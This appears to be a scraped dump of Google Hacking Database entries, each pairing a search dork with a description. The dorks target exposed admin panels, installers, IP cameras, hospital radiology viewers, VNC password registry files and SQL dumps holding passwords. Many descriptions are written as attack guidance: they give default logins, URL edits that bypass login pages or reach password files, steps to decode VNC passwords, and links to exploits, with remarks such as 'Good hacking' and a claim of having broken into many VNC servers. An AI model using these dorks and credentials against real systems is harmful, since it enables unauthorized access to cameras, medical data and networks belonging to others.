[[url]http://www.google.com/search?hl=en&lr=lang_en&q=filetype%3Areg+reg+%2Bintext%3A%E2%80%9DWINVNC3%E2%80%9D&lr=lang_en[url]]
[[dork]filetype:reg reg +intext:â€WINVNC3â€[dork]]
[end][1618]]
[[start][1619]
[[title]"Please re-enter your password It must match exactly"[title]]
[[descr]Invision Powerboard registration pages. Plain and simple.[descr]]
[[url]http://www.google.com/search?ie=ISO-8859-1&q=%22Please+re-enter+your+password+It+must+match+exactly%22&btnG=Google+Search[url]]
[[dork]"Please re-enter your password It must match exactly"[dork]]
[end][1619]]
[[start][1620]
[[title]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu[[title]]
[[descr]The page to change admin passwords. Minor threat but the place to start an attack.[descr]]
[[url]http://www.google.com/search?q=intext:%22Fill+out+the+form+below+completely+to+change+your+password+and+user+name.+If+new+username+is+left+blank,+your+old+one+will+be+assumed.%22+-edu+-gov+-mil&hl=en&lr=&start=180&sa=N&filter=0[url]]
[[dork]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu -gov -mil[dork]]
[end][1620]]
[[start][1609]
[[title]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[[title]]
[[descr]A variation on Jeffball55's original Intellinet Ip Camera.<br>
This search finds several more web cams.<br>
A suggested secondary search:<br>
"Administrator Menu" "camera Name" "Location" "frame rate" intitle:network.camera -pdf<br>
Thanks jeffball.<br>
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22%3A%3A%3A%3A%3A+INTELLINET+IP+Camera+Homepage+%3A%3A%3A%3A%3A%22+OR+inurl%3A%2Fmain_activex.asp+OR+inurl%3A%2Fmain_applet.cgi&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.m[url]]
[[dork]intitle:"::::: INTELLINET IP Camera Homepage :::::" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi[dork]]
[end][1609]]
[[start][1610]
[[title]filetype:pl intitle:"Ultraboard Setup"[title]]
[[descr]Setup pages to the ultraboard system.[descr]]
[[url]http://www.google.com/search?q=filetype%3Apl+intitle%3A%22Ultraboard+Setup%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]filetype:pl intitle:"Ultraboard Setup"[dork]]
[end][1610]]
[[start][1611]
[[title]inurl:install.pl intext:"Reading path paramaters" -edu[[title]]
[[descr]Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible[descr]]
[[url]http://www.google.com/search?q=inurl:install.pl+intext:%22Reading+path+paramaters%22+-edu&hl=en&hs=cFH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:install.pl intext:"Reading path paramaters" -edu[dork]]
[end][1611]]
[[start][1612]
[[title]inurl:build.err[[title]]
[[descr]General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too.[descr]]
[[url]http://www.google.com/search?q=inurl%3Abuild.err+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]inurl:build.err [dork]]
[end][1612]]
[[start][1613]
[[title]intext:ViewCVS inurl:Settings.php[[title]]
[[descr]CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc.[descr]]
[[url]http://www.google.com/search?q=intext%3AViewCVS+inurl%3ASettings.php+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]intext:ViewCVS inurl:Settings.php [dork]]
[end][1613]]
[[start][1614]
[[title]"Powered by Midmart Messageboard" "Administrator Login"[title]]
[[descr]Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up.[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+Midmart+Messageboard%22+%22Administrator+Login%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]]
[[dork]"Powered by Midmart Messageboard" "Administrator Login"[dork]]
[end][1614]]
[[start][1615]
[[title]inurl:install.pl intitle:GTchat[[title]]
[[descr]Gtchat install file.<br>
You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.[descr]]
[[url]http://www.google.com/search?q=inurl:install.pl+intitle:GTchat+&hl=en&hs=yTH&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:install.pl intitle:GTchat [dork]]
[end][1615]]
[[start][1616]
[[title]inurl:rpSys.html[[title]]
[[descr]Web configuration pages for various types of systems. Many of these systems are not password protected.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1616]]
[[start][1617]
[[title]intitle:"Horde :: My Portal" -"Tickets"[title]]
[[descr]Hi<br>
It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...<br>
<br>
Edited by CP[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&rls=GBSA%2CGBSA%3A2006-05%2CGBSA%3Aen&q=intitle%3A%22Horde+%3A%3A+My+Portal%22+-%22%5BTickets%22&btnG=Search[url]]
[[dork]intitle:"Horde :: My Portal" -"[Tickets"[dork]]
[end][1617]]
[[start][1618]
[[title]filetype:reg reg +intext:”WINVNC3”[[title]]
[[descr]This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:<br>
\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or<br>
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password<br>
<br>
If you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.<br>
<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=lang_en&q=filetype%3Areg+reg+%2Bintext%3A%E2%80%9DWINVNC3%E2%80%9D&lr=lang_en[url]]
[[dork]filetype:reg reg +intext:â€WINVNC3â€[dork]]
[end][1618]]
[[start][1619]
[[title]"Please re-enter your password It must match exactly"[title]]
[[descr]Invision Powerboard registration pages. Plain and simple.[descr]]
[[url]http://www.google.com/search?ie=ISO-8859-1&q=%22Please+re-enter+your+password+It+must+match+exactly%22&btnG=Google+Search[url]]
[[dork]"Please re-enter your password It must match exactly"[dork]]
[end][1619]]
[[start][1620]
[[title]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu[[title]]
[[descr]The page to change admin passwords. Minor threat but the place to start an attack.[descr]]
[[url]http://www.google.com/search?q=intext:%22Fill+out+the+form+below+completely+to+change+your+password+and+user+name.+If+new+username+is+left+blank,+your+old+one+will+be+assumed.%22+-edu+-gov+-mil&hl=en&lr=&start=180&sa=N&filter=0[url]]
[[dork]intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu -gov -mil[dork]]
[end][1620]]
[[start][1621]
[[title]inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"[title]]
[[descr]gives tons of private forum configuration information.<br>
examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.<br>
Also Crazyboard has known vulnerabilities.[descr]]
[[url]http://www.google.com/search?q=inurl:CrazyWWWBoard.cgi+intext:%22detailed+debugging+information%22&hl=en&lr=&start=10&sa=N&filter=0[url]]
[[dork]inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"[dork]]
[end][1621]]
[[start][1622]
[[title]inurl:/cgi-nmis/nmiscgi.pl -edu -us -gov[[title]]
[[descr]Dashboard monitering software. Status of websites, devices and servers online. No password required to browse the systems.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3A%2Fcgi-nmis%2Fnmiscgi.pl+-edu+-us+-gov&btnG=Search[url]]
[[dork]inurl:/cgi-nmis/nmiscgi.pl -edu -us -gov[dork]]
[end][1622]]
[[start][1623]
[[title]intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"[title]]
[[descr]Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.<br>
With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. <br>
<br>
Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed.[descr]]
[[url]http://www.google.com/search?q=intext:%22Welcome+to+Taurus%22+%22The+Taurus+Server+Appliance%22+intitle:%22The+Taurus+Server+Appliance%22&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]intext:"Welcome to Taurus" "The Taurus Server Appliance" intitle:"The Taurus Server Appliance"[dork]]
[end][1623]]
[[start][1624]
[[title]inurl:wl.exe inurl:?SS1= intext:"Operating system:" -edu -gov -mil[[title]]
[[descr]List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods.[descr]]
[[url]http://www.google.com/search?q=inurl:wl.exe+inurl:%3FSS1%3D+intext:%22Operating+system:%22+-edu+-gov+-mil&hl=en&lr=&start=90&sa=N&filter=0[url]]
[[dork]inurl:wl.exe inurl:?SS1= intext:"Operating system:" -edu -gov -mil[dork]]
[end][1624]]
[[start][1625]
[[title]inurl:setdo.cgi intext:"Set DO OK"[title]]
[[descr]Dcs-2100 cameras<br>
By removing "intext:Set DO OK" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera.[descr]]
[[url]http://www.google.com/search?q=inurl:setdo.cgi+intext:%22Set+DO+OK%22&hl=en&hs=hLE&lr=&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]]
[[dork]inurl:setdo.cgi intext:"Set DO OK"[dork]]
[end][1625]]
[[start][1634]
[[title]intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"[title]]
[[descr]Find web app: 4Images = 1.7.1<br>
This web app is vulenrable to remote code execution exploit.<br>
The url of exploit is this: http://milw0rm.com/id.php?id=1533<br>
<br>
Good hacking<br>
By HaVoC[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1634]]
[[start][1636]
[[title]"not for public release" -.edu -.gov -.mil[[title]]
[[descr]if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22not+for+public+release%22+-.edu+-.gov+-.mil&btnG=Search[url]]
[[dork]"not for public release" -.edu -.gov -.mil[dork]]
[end][1636]]
[[start][1637]
[[title](intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")[[title]]
[[descr]Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.<br>
<br>
If exploited correctly, could give you admin access to a network.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22metaframe+XP+Login%22%29%7C%28intitle%3A%22metaframe+Presentation+server+Login%22%29&btnG=Search[url]]
[[dork](intitle:"metaframe XP Login")|(intitle:"metaframe Presentation server Login")[dork]]
[end][1637]]
[[start][1638]
[[title]inurl:ids5web[[title]]
[[descr]EasyAccess Web is a application to view radiological images online.<br>
Like in hospitals or universities.<br>
Problem is the default administrative login: wadm/wadm<br>
<br>
Be able to watch sensitive data and images.<br>
very bad...[descr]]
[[url]http://www.google.com/search?rls=en&q=inurl:ids5web&ie=utf-8&oe=utf-8[url]]
[[dork]inurl:ids5web[dork]]
[end][1638]]
[[start][1647]
[[title]filetype:sql "insert into" (pass|passwd|password)[[title]]
[[descr]Looks for SQL dumps containing cleartext or encrypted passwords.<br>
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Asql+%22insert+into%22+%28pass%7Cpasswd%7Cpassword%29&btnG=Search[url]]
[[dork]filetype:sql "insert into" (pass|passwd|password)[dork]]
[end][1647]]
[[start][1652]
[[title]"Powered by Simplog"[title]]
[[descr]Searches for simplog which has directory traversal and XSS velnerabilites in version <= 1.0.2 <br>
<br>
http://notlegal.ws/simplogsploit.txt<br>
http://retrogod.altervista.org/simplog_092_incl_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%22Powered+by+Simplog%22&btnG=Google+Search[url]]
[[dork]"Powered by Simplog"[dork]]
[end][1652]]
[[start][1653]
[[title]"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )[[title]]
[[descr]Searches for scripts that let you upload files which you can then execute on the server.[descr]]
[[url]http://www.google.com/search?hl=en&q=%22index+of+%2F%22+%28+upload.cfm+%7C+upload.asp+%7C+upload.php+%7C+upload.cgi+%7C+upload.jsp+%7C+upload.pl+%29&btnG=Google+Search[url]]
[[dork]"index of /" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )[dork]]
[end][1653]]
[[start][1654]
[[title]inurl:"/admin/configuration. php?" Mystore[[title]]
[[descr]Simply google inurl trick for Oscommerce for open administrator page.<br>
If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.<br>
<br>
<br>
Despite a few demo pages there are a few open admin pages for webshops.<br>
Simple patch if you are one is to place a .htpassword file in the root of the admin folder.<br>
<br>
-- J.R.Middleton[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1654]]
[[start][1655]
[[title]"powered by sblog" +"version 0.7"[title]]
[[descr]please go here for a writeup on the vulnerability.<br>
<br>
HTML injection.<br>
<br>
http://www.securityfocus.com/bid/17044[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1655]]
[[start][1656]
[[title]intitle:" - Trend Micro Control Manager 3.0" intext:"User name"[title]]
[[descr]This is the TMCM for Control Manager and most definately should not be public, TMCM controls Trend Micro SubProducts, such as Messaging AV and Server AV products. From here you could, (if you were malicous and gained entry via the login portal) Enable such features as OPS(Outbreak Prevention) where you can push a policy to your whole site, to disable Network Ports incase of a VIRUS Outbreak. Imagine "a policy to disable ALL ports, company WIDE"<br>
<br>
You would also be able to gain Server Names and IP Addresses.<br>
<br>
Currently at the time of this post, only one result is returned.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1656]]
[[start][1657]
[[title]inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"[title]]
[[descr]Ipswitch Whats Up Monitoring 2005!<br>
<br>
This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.<br>
<br>
If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.<br>
<br>
In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.<br>
<br>
For anybody that is interested, the Login Portal has a SQL based Backend.[descr]]
[[url]http://www.google.com/search?q=inurl:%22NmConsole/Login.asp%22+%7C+intitle:%22Login+-+Ipswitch+WhatsUp+Professional+2005%22+%7C+intext:%22Ipswitch+WhatsUp+Professional+2005+(SP1)%22+%22Ipswitch,+Inc%22+copyright+log+in+User+Name+password+%22Knowledge+Bas[url]]
[[dork]inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" copyright log in User Name password "Knowledge Bas[dork]]
[end][1657]]
[[start][1658]
[[title]filetype:asp + "ODBC SQL"[title]]
[[descr]This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.<br>
<br>
An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&as_qdr=all&q=filetype%3Aasp++%2B+%22%5BODBC+SQL%22&btnG=Search[url]]
[[dork]filetype:asp + "[ODBC SQL"[dork]]
[end][1658]]
[[start][1659]
[[title](intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")[[title]]
[[descr]Alter setup configuration files.<br>
add ?step=1[descr]]
[[url]http://www.google.com/search?q=(intitle:%22WordPress+%E2%80%BA+Setup+Configuration+File%22)%7C(inurl:%22setup-config.php%3Fstep%3D%22)&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork](intitle:"WordPress › Setup Configuration File")|(inurl:"setup-config.php?step=")[dork]]
[end][1659]]
[[start][1660]
[[title]intitle:"Joomla - Web Installer"[title]]
[[descr]Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.<br>
<br>
The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).<br>
<br>
The admin logon can be found searching: intitle:"- Administration [Joomla]" but there are no default passwords.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Joomla+-+Web+Installer%22&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]intitle:"Joomla - Web Installer"[dork]]
[end][1660]]
[[start][1661]
[[title]intitle:"Webview Logon Page"[title]]
[[descr]This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0[url]]
[[dork]intitle:"Webview Logon Page"[dork]]
[end][1661]]
[[start][1662]
[[title](intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")[[title]]
[[descr]PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations.[descr]]
[[url]http://www.google.com/search?num=50&q=%28intitle%3A%22PRTG+Traffic+Grapher%22+inurl%3A%22allsensors%22%29%7C%28intitle%3A%22PRTG+Traffic+Grapher+-+Monitoring+Results%22%29[url]]
[[dork](intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")[dork]]
[end][1662]]
[[start][1663]
[[title]intitle:"AR-*" "browser of frame dealing is necessary"[title]]
[[descr]A few Sharp printers ..[descr]]
[[url]http://www.google.com/search?q=intitle:%22AR-*%22+%22browser+of+frame+dealing+is+necessary%22&filter=0[url]]
[[dork]intitle:"AR-*" "browser of frame dealing is necessary"[dork]]
[end][1663]]
[[start][1664]
[[title]intitle:"WxGoos-" ("Camera image"|"60 seconds" )[[title]]
[[descr]This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.<br>
<br>
It runs on "I.T. Watchdogs, Inc. Embedded Web Server"descr]]
[[url]http://www.google.com/search?num=50&&q=intitle%3A%22WxGoos-%22+%28%22Camera+image%22%7C%2260+seconds%22+%29[url]]
[[dork]intitle:"WxGoos-" ("Camera image"|"60 seconds" )[dork]]
[end][1664]]
[[start][1665]
[[title]intext:"you to handle frequent configuration jobs easily and quickly" | intitle:"Show/Search other devices"[title]]
[[descr]ELSA DSL lan modems.[descr]]
[[url]http://www.google.com/search?q=intext:%22you+to+handle+frequent+configuration+jobs+easily+and+quickly%22+%7C+intitle:%22Show/Search+other+devices%22&num=100&filter=0[url]]
[[dork]intext:"you to handle frequent configuration jobs easily and quickly" | intitle:"Show/Search other devices"[dork]]
[end][1665]]
[[start][1666]
[[title]intitle:"NAS" inurl:indexeng.html[[title]]
[[descr]Disk Online Server NAS device.[descr]]
[[url]http://www.google.com/search?q=intitle:%22NAS%22+inurl:indexeng.html&num=100&filter=0[url]]
[[dork]intitle:"NAS" inurl:indexeng.html[dork]]
[end][1666]]
[[start][1667]
[[title]"Thank You for using WPCeasy"[title]]
[[descr]There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. <br>
<br>
http://www.securityfocus.com/archive/1/425395[descr]]
[[url]http://www.google.com/search?q=%22Thank+You+for+using+WPCeasy%22&filter=0[url]]
[[dork]"Thank You for using WPCeasy"[dork]]
[end][1667]]
[[start][1668]
[[title]intitle:"Skystream Networks Edge Media Router" -securitytracker.com[[title]]
[[descr]Skystream Networks Edge Media Router.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Skystream+Networks+Edge+Media+Router%22+-securitytracker.com&filter=0[url]]
[[dork]intitle:"Skystream Networks Edge Media Router" -securitytracker.com[dork]]
[end][1668]]
[[start][1669]
[[title]intitle:"Ethernet Network Attached Storage Utility"[title]]
[[descr]Linksys network storage utility.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Ethernet+Network+Attached+Storage++Utility%22&num=100&filter=0[url]]
[[dork]intitle:"Ethernet Network Attached Storage Utility"[dork]]
[end][1669]]
[[start][1670]
[[title]intitle:"GigaDrive Utility"[title]]
[[descr]Linksys GigaDrive network storage utility.[descr]]
[[url]http://www.google.com/search?q=intitle:%22GigaDrive+Utility%22&num=50&filter=0[url]]
[[dork]intitle:"GigaDrive Utility"[dork]]
[end][1670]]
[[start][1672]
[[title]intitle:"LOGREP - Log file reporting system" -site:itefix.no[[title]]
[[descr]Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22LOGREP+-+Log+file+reporting+system%22+-site%3Aitefix.no&btnG=Google+Search[url]]
[[dork]intitle:"LOGREP - Log file reporting system" -site:itefix.no[dork]]
[end][1672]]
[[start][1673]
[[title]intitle:"HostMonitor log" | intitle:"HostMonitor report"[title]]
[[descr]HostMonitor is a system management tool that continuously monitors servers' availability and performance. This dork find logs created by HostMonitor. The logs aren't very exciting but the control panel, that you can run tests and change settings in, can be found by searching for:<br>
intitle:"HostMonitor: Web Interface".<br>
There was only one result at the time of submitting though.<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:%22HostMonitor+log%22+%7C+intitle:%22HostMonitor+report%22&num=100&hl=en&lr=&filter=0[url]]
[[dork]intitle:"HostMonitor log" | intitle:"HostMonitor report"[dork]]
[end][1673]]
[[start][1674]
[[title]inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com[[title]]
[[descr]RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer.[descr]]
[[url]http://www.google.com/search?q=inurl:2000+intitle:RemotelyAnywhere+-site:realvnc.com&num=100&hl=en&lr=&filter=0[url]]
[[dork]inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com[dork]]
[end][1674]]
[[start][1675]
[[title]"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com[[title]]
[[descr]This dork finds firewall/vpn products from fiber logic. They only require a one-factor authentication.[descr]]
[[url]http://www.google.com/search?q=%22Web-Based+Management%22+%22Please+input+password+to+login%22+-inurl:johnny.ihackstuff.com&num=100&hl=en&lr=&filter=0[url]]
[[dork]"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com[dork]]
[end][1675]]
[[start][1676]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1676]]
[[start][1677]
[[title]inurl:client_execute.cgi[[title]]
[[descr]This search finds network cameras and video servers from Cynix Inc. They can be a good source of amusement and an okay way to pass time when the cables out.[descr]]
[[url]http://www.google.com/search?q=inurl:client_execute.cgi&num=100&hl=en&lr=&filter=0[url]]
[[dork]inurl:client_execute.cgi[dork]]
[end][1677]]
[[start][1678]
[[title]intitle:"Edr1680 remote viewer"[title]]
[[descr]This search finds the 1680 series digital video recorder from EverFocus.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial_s&q=intitle%3A%22Edr1680+remote+viewer%22&btnG=Search[url]]
[[dork]intitle:"Edr1680 remote viewer"[dork]]
[end][1678]]
[[start][1679]
[[title]"OK logout" inurl:vb.htm?logout=1[[title]]
[[descr]This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url.[descr]]
[[url]http://www.google.com/search?q=%22OK+logout%22+inurl:vb.htm%3Flogout%3D1&num=100&hl=en&lr=&filter=0[url]]
[[dork]"OK logout" inurl:vb.htm?logout=1[dork]]
[end][1679]]
[[start][1680]
[[title]intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop[[title]]
[[descr]This dork finds digital video recording client from Nuvico.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=intitle%3A%22DVR+Client%22+-the+-free+-pdf+-downloads+-blog+-download+-dvrtop&btnG=Search[url]]
[[dork]intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop[dork]]
[end][1680]]
[[start][1681]
[[title]inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -javascript[[title]]
[[descr]Ecommerce templates makes a online shopping cart solution. This search finds the admin login.[descr]]
[[url]http://www.google.com/search?q=inurl:%22vsadmin/login%22+%7C+inurl:%22vsadmin/admin%22+inurl:.php%7C.asp++-%22Response.Buffer+%3D+True%22+-javascript&num=100&hl=en&lr=&safe=off&filter=0[url]]
[[dork]inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -javascript[dork]]
[end][1681]]
[[start][1682]
[[title]intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman[[title]]
[[descr]Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url. [descr]]
[[url]http://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&num=100&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official_s&filter=0[url]]
[[dork]intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman[dork]]
[end][1682]]
[[start][1683]
[[title]inurl:"calendarscript/users.txt"[title]]
[[descr]CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? <br>
<br>
<br>
Also search for the logins:<br>
intitle:"Calendar Administration : Login" | inurl:"calendar/admin/index.asp" -demo -demos<br>
<br>
Then to get the passwords change the url from<br>
wxw.calendersiteexample.com/thissite/calendar_admin.cgi<br>
to<br>
wxw.calendersiteexample.com/thissite/calendarscript/users.txt <br>
<br>
The defaults are anonymous/anonymous and Administrator/Administrator.[descr]]
[[url]http://www.google.com/search?q=inurl:%22calendarscript/users.txt%22&num=100&hl=en&lr=&filter=0[url]]
[[dork]inurl:"calendarscript/users.txt"[dork]]
[end][1683]]
[[start][1684]
[[title]intitle:"EZPartner" -netpond[[title]]
[[descr]EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22EZPartner%22+-netpond&btnG=Search[url]]
[[dork]intitle:"EZPartner" -netpond[dork]]
[end][1684]]
[[start][1685]
[[title]"Powered by Loudblog"[title]]
[[descr]this dork is for the LoudBlog <= 0.4 arbitrary remote inclusion vulnerability<br>
<br>
advisory & poc exploit:<br>
<br>
http://retrogod.altervista.org/loudblog_04_incl_xpl.html[descr]]
[[url]http://www.google.com/search?hl=it&q=%22Powered+by+Loudblog%22+&btnG=Cerca+con+Google&meta=[url]]
[[dork]"Powered by Loudblog" [dork]]
[end][1685]]
[[start][1686]
[[title]"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo[[title]]
[[descr]Clever Copy <= 3.0 SQL injection <br>
<br>
dork: "This website engine code is copyright" "2005 by Clever Copy" <br>
<br>
advisory and poc exploit: <br>
<br>
http://retrogod.altervista.org/Clever_Copy_V3_sql_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22This+website+engine+code+is+copyright%22+%222005+by+Clever+Copy%22+-inurl:demo&hl=it&lr=&filter=0[url]]
[[dork]"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo[dork]]
[end][1686]]
[[start][1687]
[[title]intitle:"b2evo installer" intext:"Installer für Version"[title]]
[[descr]this page lets you to know some interesting info on target machine, database name, username... <br>
it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands <br>
<br>
wrote a simple dictionary attack tool fot this: <br>
<br>
http://retrogod.altervista.org/b2evo_16alpha_bf.html[descr]]
[[url]http://www.google.com/search?q=intitle:%22b2evo+installer%22+intext:%22Installer+f%C3%BCr+Version%22+&hl=it&lr=&start=0&sa=N&filter=0[url]]
[[dork]intitle:"b2evo installer" intext:"Installer für Version" [dork]]
[end][1687]]
[[start][1691]
[[title]inurl:fingerprint.jsp -CVS -Mailing intext:Servlet+Engine[[title]]
